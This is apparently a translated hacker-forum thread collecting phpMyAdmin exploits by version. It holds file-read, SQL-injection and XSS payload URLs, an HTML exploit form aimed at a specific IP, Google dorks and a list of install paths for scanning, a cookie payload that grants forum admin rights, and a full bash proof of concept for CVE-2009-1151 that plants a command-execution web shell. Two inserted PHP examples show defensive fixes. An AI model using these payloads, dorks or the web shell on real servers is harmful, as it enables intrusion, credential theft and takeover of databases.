[ phpMyAdmin vulnerability overview ]
Vulnerability
2.2.0rc3
http://victim/phpmyadmin/tbl_copy.php?db=test&table=haxor&new_name=test.haxor2&strCopyTableOK=".passthru('cat%20/etc/passwd')."
The exploit gives arbitrary code execution.
2.3.2
http://target.com/phpMyAdmin/tbl_properties_structure.php?lang=<SQL INJECTION>
SQL-injection
2.5.*
phpMyAdmin 2.5.7 Remote code injection Exploit (http://milw0rm.com/exploits/309)
The exploit gives arbitrary code execution.
2.5.5-pl1 and prior
http://[target]/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00
The exploit gives file reading / arbitrary code execution.
2.6.4-pl1
phpMyAdmin 2.6.4-pl1 Remote Directory Traversal Exploit (http://milw0rm.com/exploits/1244)
The exploit gives reading of any file.
HTML-Exploit:
<CENTER>
<A HREF="http://www.securityreason.com"><IMG SRC="http://securityreason.com/gfx/small_logo.png"></A><P>
<FORM action="http://74.69.111.236:4681/phpmyadmin/libraries/grab_globals.lib.php" method=post enctype="multipart/form-data">
<input TYPE="hidden" name="usesubform[1]" value="1">
<input TYPE="hidden" name="usesubform[2]" value="1">
<input TYPE="text" name="subform[1][redirect]" value="../../../../../../../etc/passwd" size=30> File<p>
<input TYPE="hidden" name="subform[1][cXIb8O3]" value="1">
<input TYPE="submit" value="Exploit">
</FORM>
2.7.0
http://victim/phpmyadmin/server_privileges.php?server=1&checkprivs='
http://victim/phpmyadmin/server_privileges.php?server=1&hostname='&username=1&dbname=1&tablename=1
SQL-injection
2.11.2
SQL-injection + XSS
12 November 2007
Software: phpMyAdmin 2.11.2, possibly earlier versions
Severity: Low
Exploit available: No
Description:
The discovered vulnerabilities allow a remote user to carry out an XSS attack and execute arbitrary SQL commands in the application's database.
1. The vulnerability is caused by insufficient sanitisation of input data in the "db" parameter of the db_create.php script. A remote user can use a specially crafted request to execute arbitrary script code in the victim's browser in the security context of the vulnerable site. For successful exploitation the attacker must have the CREATE DATABASE privilege and the victim's browser must execute JavaScript code inside an img tag (e.g. Opera).
2. The vulnerability is caused by insufficient sanitisation of input data in the "db" parameter of the db_create.php script. A remote user can use a specially crafted request to execute arbitrary SQL commands in the application's database. For successful exploitation the attacker must have the CREATE DATABASE privilege.
other:
http://www.example.com/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00&theme=passwd%00
http://www.example.com/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00
http://www.example.com/phpMyAdmin/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No
XSS (Cross-site Scripting) :
2.6.0-pl2 and prior
http://[target]/[phpMyAdmin_directory]/main.php?"><script>alert(document.cookie)</script></
http://[target]/[phpMyAdmin_directory]/read_dump.php?sql_query=set%20@1=1&zero_rows=<script>alert(document.cookie)</script>
prior to 2.6.2-rc1
http://[target]/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><script>alert(document.cookie)</script>
http://[target]/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><h1>XSS</h1>
2.8.0.1
http://example.com/?convcharset=%22%20STYLE=%22background-image:%20url(javascript:alert('XSS'))%22%20r=%22
index.php?set_theme=%3Cscript%3Ealert('Powered By Expaethitec');%3C/script%3E
2.9.x
http://site.com/phpmyadmin/sql.php?db=information_schema&token=your_token&goto=db_details_structure.php&table=CHARACTER_SETS&pos=[xss]
other:
http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code]
http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg=777777%22%3E%3CH1%3E[XSS%20code]
http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS
http://www.example.com/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code]
http://www.example.com/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code]
http://www.example.com/phpMyAdmin/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS]
http://www.example.com/phpMyAdmin/themes/original/css/theme_right.css.php?right_font_family=[XSS]
/phpmyadmin/db_create.php?token=your_token&reload=1&db=[double xss(2 followed xss)]
/phpmyadmin/db_operations.php?db_collation=latin1_swedish_ci&db_copy=true&db=prout&token=your_token&newname=[xss]
/phpmyadmin/querywindow.php?token=your_token&db=&table=&query_history_latest=[xss]&query_history_latest_db=[xss]&querydisplay_tab=[xss]
Full path disclosure :
/scripts/check_lang.php
/themes/darkblue_orange/layout.inc.php
/index.php?lang[]=
/index.php?target[]=
/index.php?db[]=
/index.php?goto[]=
/left.php?server[]=
/index.php?table[]=
/server_databases.php?token=your_token&sort_by="
/index.php?db=information_schema&token=your_token&tbl_group[]=
/db_printview.php?db="
/sql.php?back[]=
libraries/string.lib.php
libraries/storage_engines.lib.php
libraries/sqlparser.lib.php
libraries/sql_query_form.lib.php
libraries/select_theme.lib.php
libraries/select_lang.lib.php
libraries/relation_cleanup.lib.php
libraries/left_header.inc.php
libraries/import.lib.php
libraries/header_meta_style.inc.php
libraries/grab_globals.lib.php
libraries/get_foreign.lib.php (get_foreign.lib.php?field=foo&foreigners[foo]=foo)
libraries/display_tbl_links.lib.php (display_tbl_links.lib.php?doWriteModifyAt=left&edit_url=foo)
libraries/display_import.lib.php
libraries/display_export.lib.php
libraries/display_create_table.lib.php
libraries/display_create_database.lib.php
libraries/db_table_exists.lib.php
libraries/database_interface.lib.php
libraries/common.lib.php
libraries/check_user_privileges.lib.php
libraries/charset_conversion.lib.php (charset_conversion.lib.php?cfg[AllowAnywhereRecoding]=true&allow_recoding=true)
libraries/sqlvalidator.lib.php (libraries/sqlvalidator.lib.php?cfg[SQLValidator]=use=TRUE)
libraries/import/sql.php
libraries/fpdf/ufpdf.php
libraries/auth/cookie.auth.lib.php (libraries/auth/cookie.auth.lib.php?coming_from_common=true)
dork:
inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin
intitle:"index of/phpmyadmin"
phpMyAdmin "running on" inurl:"main.php"
phpMyAdmin dumps
"phpMyAdmin" "running on" inurl:"main.php"
filetype:txt | filetype:sql ("phpMyAdmin SQL Dump"|"phpMyAdmin MySQL-Dump")
intitle:"index of /phpmyadmin" -tar
allinurl:/tbl_properties_structure.php?
inurl:main.php "Welcome to phpMyadmin" -"No Privileges" +"runtime" -"as root@"
http://www.google.com/search?hl=en&lr=&c2coff=1&q=intext:"welcome to phpmyadmin" -login -"no privileges" "Create new database [Documentation]" inurl:phpmyadmin -demo
File locations
/phpm/
/phpmy/
/phpmyadmin/
/PMA/
/mysql/
/admin/
/db/
/dbadmin/
/web/phpMyAdmin/
/admin/pma/
/admin/phpmyadmin/
/admin/mysql/
/phpmyadmin2/
/mysqladmin/
/mysql-admin/
/phpMyAdmin-2.5.6/
/phpMyAdmin-2.5.4/
/phpMyAdmin-2.5.1/
/phpMyAdmin-2.2.3/
/phpMyAdmin-2.2.6/
/myadmin/
/phpMyA/
/phpmyad/
/phpMyAdmin-2.6.0/
/phpMyAdmin-2.6.0-pl1/
/phpMyAdmin-2.6.3-pl1/
/phpMyAdmin-2.6.3/
/phpMyAdmin-2.6.3-rc1/
/phpMyAdmin-2.6.2-rc1/
/phpMyAdmi/
/phpMyAdmin1/
/phpMyAdmin2/
/phpMyAdmin-2/
/phpMyAdmin-2.10.0/
/phpMyAdmin-2.3.0/
/phpMyAdmin-2.3.1/
/phpMyAdmin-2.3.2/
/phpMyAdmin-2.3.3/
/phpMyAdmin-2.3.4/
/phpMyAdmin-2.3.5/
/phpMyAdmin-2.3.6/
/phpMyAdmin-2.3.7/
/phpMyAdmin-2.3.8/
/phpMyAdmin-2.3.9/
/phpMyAdmin-2.4.0/
/phpMyAdmin-2.4.1/
/phpMyAdmin-2.4.2/
/phpMyAdmin-2.4.3/
/phpMyAdmin-2.4.4/
/phpMyAdmin-2.4.5/
/phpMyAdmin-2.4.6/
/phpMyAdmin-2.4.7/
/phpMyAdmin-2.4.8/
/phpMyAdmin-2.4.9/
/phpMyAdmin-2.5.0/
/phpMyAdmin-2.5.1/
/phpMyAdmin-2.5.2/
/phpMyAdmin-2.5.3/
/phpMyAdmin-2.5.4/
/phpMyAdmin-2.5.5/
/phpMyAdmin-2.5.6/
/phpMyAdmin-2.5.7/
/phpMyAdmin-2.5.8/
/phpMyAdmin-2.5.9/
/phpMyAdmin-2.6.0/
/phpMyAdmin-2.6.1/
/phpMyAdmin-2.6.2/
/phpMyAdmin-2.6.3/
/phpMyAdmin-2.6.4/
/phpMyAdmin-2.6.5/
/phpMyAdmin-2.6.6/
/phpMyAdmin-2.6.7/
/phpMyAdmin-2.6.8/
/phpMyAdmin-2.6.9/
/phpMyAdmin-2.7.0/
/phpMyAdmin-2.7.1/
/phpMyAdmin-2.7.2/
/phpMyAdmin-2.7.3/
/phpMyAdmin-2.7.4/
/phpMyAdmin-2.7.5/
/phpMyAdmin-2.7.6/
/phpMyAdmin-2.7.7/
/phpMyAdmin-2.7.8/
/phpMyAdmin-2.7.9/
/phpMyAdmin-2.8.1/
/phpMyAdmin-2.8.2/
/phpMyAdmin-2.8.3/
/phpMyAdmin-2.8.4/
/phpMyAdmin-2.8.5/
/phpMyAdmin-2.8.6/
/phpMyAdmin-2.8.7/
/phpMyAdmin-2.8.8/
/phpMyAdmin-2.8.9/
/phpMyAdmin-2.9.1/
/phpMyAdmin-2.9.2/
/phpMyAdmin-3/
/phpMyAdmin-4/
/phpMyAds/
/phpmyad-sys/
phpMyAdmin security announcement (http://www.phpmyadmin.net/home_page/security.php)
Announcement-ID: PMASA-2008-1
Date: 2008-03-01
Updated: 2008-03-03
Summary:
SQL injection vulnerability (Delayed Cross Site Request Forgery)
Description:
We received an advisory from Richard Cunningham, and we wish to thank him for his work. phpMyAdmin used the $_REQUEST superglobal as a source for its parameters, instead of $_GET and $_POST. This means that on most servers, a cookie with the same name as one of phpMyAdmin's parameters can interfere.
Another application could set a cookie for the root path "/" with a "sql_query" name, therefore overriding the user-submitted sql_query because by default, the $_REQUEST superglobal imports first GET, then POST then COOKIE data.
Severity:
We consider this vulnerability to be serious.
Mitigation factor:
An attacker must trick the victim into visiting a page on the same web server where he has placed code that creates a malicious cookie.
Affected versions:
Versions before 2.11.5.
Solution:
Upgrade to phpMyAdmin 2.11.5 or newer, where $_REQUEST is rebuilt to not contain cookies.
note on the official site. (http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2008-1)
Usage example:
We have a site with phpMyAdmin installed (actually it doesn't even matter much where, the main thing is that it's installed and the admin logs into it), a forum (IPB, for example) and a script affected by a stored XSS (for example, let's take a hypothetical stored XSS in IPB private messages). We send the admin a payload with the XSS (it's important to know the table prefix used on the forum).
Code:
<script>
document.cookie="sql_query=update ibf_members set mgroup=4 where id=31337; path=/; expires=Mon, 01-Jan-2009 00:00:00 GMT";
</script>
ibf_ - the forum's table prefix
4 - the admin group
31337 - our id on the forum
Once the admin is "infected" with the XSS, all that's left is to wait until he opens phpMyAdmin. There, the SQL query the admin runs will be overwritten and will make us a forum admin (with this value of the sql_query parameter). To avoid attracting attention you can "play" with the expires parameter.
PS at the moment practically every phpMyAdmin is affected (they haven't had time to update, lol))
a couple more XSS; they work in version 2.6.1, the latest versions aren't vulnerable:
http://site/phpMyAdmin/index.php?GLOBALS[cfg][PmaAbsoluteUri]="><script>alert(5555)</script>
http://site/phpMyAdmin/calendar.php?GLOBALS[cfg][PmaAbsoluteUri]="><script>alert(5555)</script>
etc.
register_globals and magic_quotes don't matter
http://localhost/Tools/phpMyAdmin/mult_submits.inc.php?submit_mult=1&what=1&strDoYouReally=<script>alert(5555)</script>
register_globals on
in theory this script is vulnerable in the latest versions too, but it has been moved into libraries and changed slightly; in 2.11.5 it's exploited like this:
http://localhost/Tools/phpMyAdmin/libraries/mult_submits.inc.php?submit_mult=1&what="><script>alert(5555)</script>
but I think in the latest versions access to the script is denied by default via .htaccess
It is a variable that was not cleaned in a way, allowing you to inject SQL code into the cookie. Here is a example of a small vulnerable php script.
<?php
$user['id'] = $_COOKIE['uid'];
$query = "SELECT name, password FROM members where uid='" . $user['id'] . "'";
$query = mysql_query($query);
$name = mysql_result($query, 0);
echo 'Hello ' . $name . '!';
?>
If it is a normal user, it would display a perfectly good name like "Hello Admin!".
You can now use a thing such the extention for firefox called Cookie Editor, and modify the cookie, you can also do this with javascript.
You then edit the cookie's value, it would have been something like "12", but after editing and adding sql code to it, it would be something like "-1 UNION ALL SELECT USER(), NULL FROM mysql.user--".
That will change the query, and display the user connected to the database, instead of the name of the user stored in the database.
That will result in the following being echo'd; "Hello root@localhost".
(c) h4cky0u (http://h4cky0u.org/viewtopic.php?f=2&t=21736)
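The PMASA-2008-1 cookie override above and the h4cky0u cookie-injection snippet come down to the same mistake: a value taken from a cookie is trusted as if it were a validated form field. The following is an added example, not code from this thread or from phpMyAdmin; it shows the hardened handling of both cases. It assumes PHP with PDO and the pdo_sqlite extension (an in-memory SQLite database stands in for MySQL), and the function names build_request() and lookup_member_name() are hypothetical. The table and column names follow the h4cky0u snippet.

```php
<?php
// Added example, not code from this thread or from phpMyAdmin.
// Function names are hypothetical; the cookie and request data are constructed.
declare(strict_types=1);

/**
 * PMASA-2008-1 fix pattern: build the request array from GET and POST only,
 * so a cookie named e.g. "sql_query" can never shadow a form field.
 * PHP's own $_REQUEST merges GET, POST and COOKIE in the order the ini
 * settings prescribe, which on a default 2008-era host ended with cookies.
 */
function build_request(array $get, array $post): array
{
    // POST deliberately wins over GET; cookies are never consulted.
    return array_merge($get, $post);
}

/**
 * Hardened version of the h4cky0u snippet: the cookie still carries the
 * identifier, but it is validated as a positive integer and bound as a
 * parameter, so "-1 UNION ALL SELECT ..." is never parsed as SQL.
 */
function lookup_member_name(PDO $db, array $cookies): ?string
{
    $uid = filter_var(
        $cookies['uid'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($uid === false) {
        return null;   // reject instead of interpolating the raw cookie
    }
    $stmt = $db->prepare('SELECT name FROM members WHERE uid = :uid');
    $stmt->bindValue(':uid', $uid, PDO::PARAM_INT);
    $stmt->execute();
    $name = $stmt->fetchColumn();
    return $name === false ? null : (string) $name;
}

// --- Self-contained demonstration on an in-memory SQLite database ---------
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE members (uid INTEGER PRIMARY KEY, name TEXT, password TEXT)');
$db->exec("INSERT INTO members VALUES (12, 'Admin', 'x')");

// Constructed cookies: the benign value and the injection string from the post.
var_dump(lookup_member_name($db, ['uid' => '12']));   // string(5) "Admin"
var_dump(lookup_member_name($db, ['uid' => '-1 UNION ALL SELECT USER(), NULL FROM mysql.user--']));   // NULL

// Constructed request: a cookie trying to override the submitted sql_query.
$get    = ['sql_query' => 'SELECT 1'];
$post   = [];
$cookie = ['sql_query' => 'UPDATE ibf_members SET mgroup=4 WHERE id=31337'];
$req = build_request($get, $post);
var_dump($req['sql_query']);   // string(8) "SELECT 1": the cookie is ignored
```

The two checks are independent: even if an application keeps reading $_REQUEST, binding the identifier as an integer parameter stops the UNION payload, and even if it keeps concatenating SQL, dropping cookies from the request array stops the delayed-CSRF override. Doing both is the point.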
~!DoK_tOR!~
20.09.2008, 03:37
Vulnerable:
Typo3 phpMyAdmin 3.2
Typo3 phpMyAdmin 3.0.1
Typo3 phpMyAdmin 3.0
Typo3 phpMyAdmin 0.2.2
Turbolinux Appliance Server 3.0 x64
Turbolinux Appliance Server 3.0
phpMyAdmin phpMyAdmin 2.11.9
phpMyAdmin phpMyAdmin 2.11.8
phpMyAdmin phpMyAdmin 2.11.7
phpMyAdmin phpMyAdmin 2.11.5.1
phpMyAdmin phpMyAdmin 2.11.5
phpMyAdmin phpMyAdmin 2.11.4
phpMyAdmin phpMyAdmin 2.11.1
phpMyAdmin phpMyAdmin 2.9.1
phpMyAdmin phpMyAdmin 2.9.2-rc1
phpMyAdmin phpMyAdmin 2.9.1.1
phpMyAdmin phpMyAdmin 2.11.8.1
phpMyAdmin phpMyAdmin 2.11.5.2
phpMyAdmin phpMyAdmin 2.11.2.2
phpMyAdmin phpMyAdmin 2.11.2.1
phpMyAdmin phpMyAdmin 2.11.1.2
phpMyAdmin phpMyAdmin 2.11.1.1
phpMyAdmin phpMyAdmin 2.10.0.2
phpMyAdmin phpMyAdmin 2.10.0.1
Exploit:
http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]
Execution of arbitrary PHP code on the server, including calling external commands via PHP's exec() function.
Solution:
Upgrade to phpMyAdmin 2.11.9.1 or newer.
Not Vulnerable:
Typo3 phpMyAdmin 3.3
phpMyAdmin phpMyAdmin 2.11.9.1
www.phpmyadmin.net (http://www.phpmyadmin.net/home_page/security.php%3Fissue%3DPMASA-2008-7)
the bug is analysed here (https://forum.antichat.net/threadnav46016-341-10.html)
Also worth adding: the bug works starting from version [ phpMyAdmin 2.9.0-beta1 => ]
phpMyAdmin 3.1.0 (XSRF) SQL Injection Vulnerability
______________________
http://www.milw0rm.com/exploits/7382
baltazar
24.12.2008, 21:31
XSS
[CODE]http://[server]/main.php?reload=1&message=aa&sql_query=[XSS]&token=[SID]
http://[server]/server_privileges.php?token=[SID]&username=[XSS]
http://[server]/sql.php?db=information_schema&token=[SID]&goto=db_structure.php&table=KEY_COLUMN_USAGE&pos=[XSS]
http://[server]/sql.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30[XSS]&disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`
http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4[XSS]
http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=[XSS]&unlim_num_rows=4&single_table=true
http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0[XSS]&session_max_rows=30&disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4&single_table=true[/CODE]
Original: http://downloads.securityfocus.com/vulnerabilities/exploits/25268.html
Also worth adding: the bug works starting from version [ phpMyAdmin 2.9.0-beta1 => ]
:) I'd also add:
Works on MySQL 4.
On 5 it doesn't work.
At least for me.
Just tested it.) (good thing it's 4 where it matters))))
ph1l1ster
16.03.2009, 02:12
calendar.php?GLOBALS
you can find out the exact version if it's > 3.*
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[CODE]#!/bin/bash
# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11
# by pagvac (gnucitizen.org), 4th June 2009.
# special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln,
# and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!
# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)
# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
# 3) administrator must have NOT deleted the '/config/' directory
# within the '/phpMyAdmin/' directory. this is because this directory is
# where '/scripts/setup.php' tries to create 'config.inc.php' which is where
# our evil PHP code is injected 8)
# more info on:
# http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
# http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/
if [[ $# -ne 1 ]]
then
    echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>"
    echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"
    exit
fi
if ! which curl >/dev/null
then
    echo "sorry but you need curl for this script to work!"
    echo "on Debian/Ubuntu: sudo apt-get install curl"
    exit
fi
function exploit {
    # serialized Servers[0] array whose first key closes the PHP string literal
    # that setup.php writes, so the rest of the key becomes code (phpinfo() probe)
    postdata="token=$1&action=save&configuration="\
"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]="\
"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\
"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:"\
"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:"\
"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"
    # same technique with the second-stage payload (c= and p= handlers)
    postdata2="token=$1&action=save&configuration=a:1:"\
"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d="\
"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3b"\
"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\
"if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval"\
"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\
"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22"\
"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:"\
"%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config"\
"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"
    flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html"
    echo "[+] attempting to inject phpinfo() ..."
    curl -ks -b "$2" -d "$postdata" --url "$3/scripts/setup.php" >/dev/null
    if curl -ks --url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null
    then
        curl -ks --url "$3/config/config.inc.php" >"$flag"
        echo "[+] success! phpinfo() injected successfully! output saved on $flag"
        curl -ks -b "$2" -d "$postdata2" --url "$3/scripts/setup.php" >/dev/null
        echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"
        echo "    $3/config/config.inc.php?c=ls+-l+/"
        echo "    $3/config/config.inc.php?p=phpinfo();"
        echo "    please send any feedback/improvements for this script to"\
"unknown.pentester<AT_sign__here>gmail.com"
    else
        echo "[+] no luck injecting to $3/config/config.inc.php :("
        exit
    fi
}
# end of exploit function
cookiejar="/tmp/$(basename $0).$RANDOM.txt"
# the setup form embeds a 32-character token that must accompany the POST
token=`curl -ks -c "$cookiejar" --url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12`
echo "[+] checking if phpMyAdmin exists on URL provided ..."
#if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null
if grep phpMyAdmin "$cookiejar" &>/dev/null
then
    length=`echo -n $token | wc -c`
    # valid form token obtained?
    if [[ $length -eq 32 ]]
    then
        echo "[+] phpMyAdmin cookie and form token received successfully. Good!"
        # attempt exploit!
        exploit "$token" "$cookiejar" "$1"
    else
        echo "[+] could not grab form token. you might want to try exploiting the vuln manually :("
        exit
    fi
else
    echo "[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"
    exit
fi
# milw0rm.com [2009-06-09][/CODE]
CVE-2009-1151 (http://web.nvd.nist.gov/view/vuln/detail?execution=e3s1) (phpmyadminrcesh.txt (http://www.gnucitizen.org/static/blog/2009/06/phpmyadminrcesh.txt)) PMASA-2009-3 (http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php) PMASA-2009-4 (http://www.phpmyadmin.net/home_page/security/PMASA-2009-4.php)
<?php
/*
* Generated configuration file
* Generated by: phpMyAdmin 3.0.1.1 setup script by Michal Čihař <michal@cihar.com>
* Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $
* Date: Tue, 09 Jun 2009 14:13:34 GMT
*/
/* Servers configuration */
$i = 0;
/* Server (config:root) [1] */
$i++;
$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo
'<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo
'<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
/* End of servers configuration */
?>
phpMyAdmin//config/config.inc.php?c=ls+-l+/
phpMyAdmin//config/config.inc.php?p=phpinfo();
Vulnerable software and versions:
phpmyadmin:3.1.3
phpmyadmin:3.1.3:rc1
phpmyadmin:3.1.2
phpmyadmin:3.1.2:rc1
phpmyadmin:3.1.1
phpmyadmin:3.1.1:rc1
phpmyadmin:3.1.0
phpmyadmin:2.11.9.3
phpmyadmin:2.11.9.4
phpmyadmin:2.11.9.2
phpmyadmin:2.11.9.1
phpmyadmin:2.11.9.0
phpmyadmin:2.11.9
phpmyadmin:2.11.8
phpmyadmin:2.11.7.1
phpmyadmin:2.11.7.0
phpmyadmin:2.11.7
phpmyadmin:2.11.6:rc1
phpmyadmin:2.11.6.0
phpmyadmin:2.11.6
phpmyadmin:2.11.5:rc1
phpmyadmin:2.11.5.2
phpmyadmin:2.11.5.1
phpmyadmin:2.11.5.0
phpmyadmin:2.11.5
phpmyadmin:2.11.4:rc1
phpmyadmin:2.11.4
phpmyadmin:2.11.3:rc1
phpmyadmin:2.11.3.0
phpmyadmin:2.11.3
phpmyadmin:2.11.2.2
phpmyadmin:2.11.2.1
phpmyadmin:2.11.2.0
phpmyadmin:2.11.2
phpmyadmin:2.11.1:rc1
phpmyadmin:2.11.1.2
phpmyadmin:2.11.1.1
phpmyadmin:2.11.1.0
phpmyadmin:2.11.1
phpmyadmin:2.11.0:rc1
phpmyadmin:2.11.0:beta1
phpmyadmin:2.11.0
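The generated config.inc.php above shows what went wrong in CVE-2009-1151: the setup script pasted a user-controlled array key straight into PHP source, so a key containing `']=''; ...//` closed the string literal and the remainder became code. The following is an added example, not phpMyAdmin's code. The writer functions render_server_line_unsafe() and render_server_line_safe() are hypothetical, and the malicious key and value are constructed to mirror the PoC's phpinfo() stage. It contrasts the string-concatenation writer with one that accepts only known option names and emits values through var_export(), and tokenizes each generated line to show the difference.

```php
<?php
// Added example, not phpMyAdmin's code. Writer functions are hypothetical;
// the malicious key and value are constructed to mirror the PoC's first stage.
declare(strict_types=1);

// Vulnerable pattern: key and value are dropped into PHP source by string
// concatenation, so a quote inside either one ends the literal early.
function render_server_line_unsafe(string $key, string $value): string
{
    return "\$cfg['Servers'][\$i]['" . $key . "'] = '" . $value . "';\n";
}

// Safe pattern: the key must be an option the setup script knows, and the
// value is emitted through var_export(), which yields one escaped literal.
const KNOWN_SERVER_KEYS = ['host', 'extension', 'connect_type', 'compress', 'auth_type', 'user'];

function render_server_line_safe(string $key, $value): string
{
    if (!in_array($key, KNOWN_SERVER_KEYS, true)) {
        throw new InvalidArgumentException('unknown server option: ' . var_export($key, true));
    }
    return "\$cfg['Servers'][\$i][" . var_export($key, true) . '] = ' . var_export($value, true) . ";\n";
}

// Count top-level statements in a generated line by tokenizing it. A config
// assignment is exactly one statement; a second ';' token outside any string
// literal means the untrusted text escaped its literal and became code.
function statement_count(string $php_line): int
{
    $count = 0;
    foreach (token_get_all("<?php\n" . $php_line) as $tok) {
        if ($tok === ';') {   // single-character tokens are plain strings
            $count++;
        }
    }
    return $count;
}

// --- Demonstration ---------------------------------------------------------
$evil_key   = "host']=''; phpinfo();//";   // constructed: the key injection the PoC used
$evil_value = "'; phpinfo(); //";          // constructed: the same trick via a value

$unsafe = render_server_line_unsafe($evil_key, 'localhost');
echo $unsafe;                         // $cfg['Servers'][$i]['host']=''; phpinfo();//'] = 'localhost';
echo statement_count($unsafe), "\n";  // 2: phpinfo() has become a statement of its own

try {
    render_server_line_safe($evil_key, 'localhost');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";   // unknown key never reaches the file
}

$safe = render_server_line_safe('host', $evil_value);
echo $safe;                           // $cfg['Servers'][$i]['host'] = '\'; phpinfo(); //';
echo statement_count($safe), "\n";    // 1: still a single assignment

// Non-string options go through the same writer without special cases.
echo render_server_line_safe('compress', false);   // $cfg['Servers'][$i]['compress'] = false;
```

The allowlist is what closes the key-side hole, and var_export() is what closes the value-side hole; neither alone covers both. The separate operational fix from the advisory, removing the writable config/ directory after setup, still applies, because a generator that cannot write is the only one that can never be abused.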
Regarding full path disclosure
In recent versions the phpMyAdmin root contains a phpinfo.php file with the corresponding content, and as a rule admins don't delete it
File locations
/php-my-admin/
/phpMyAdmin-2.5.5-rc1/
/phpMyAdmin-2.5.5-rc2/
/phpMyAdmin-2.5.5-pl1/
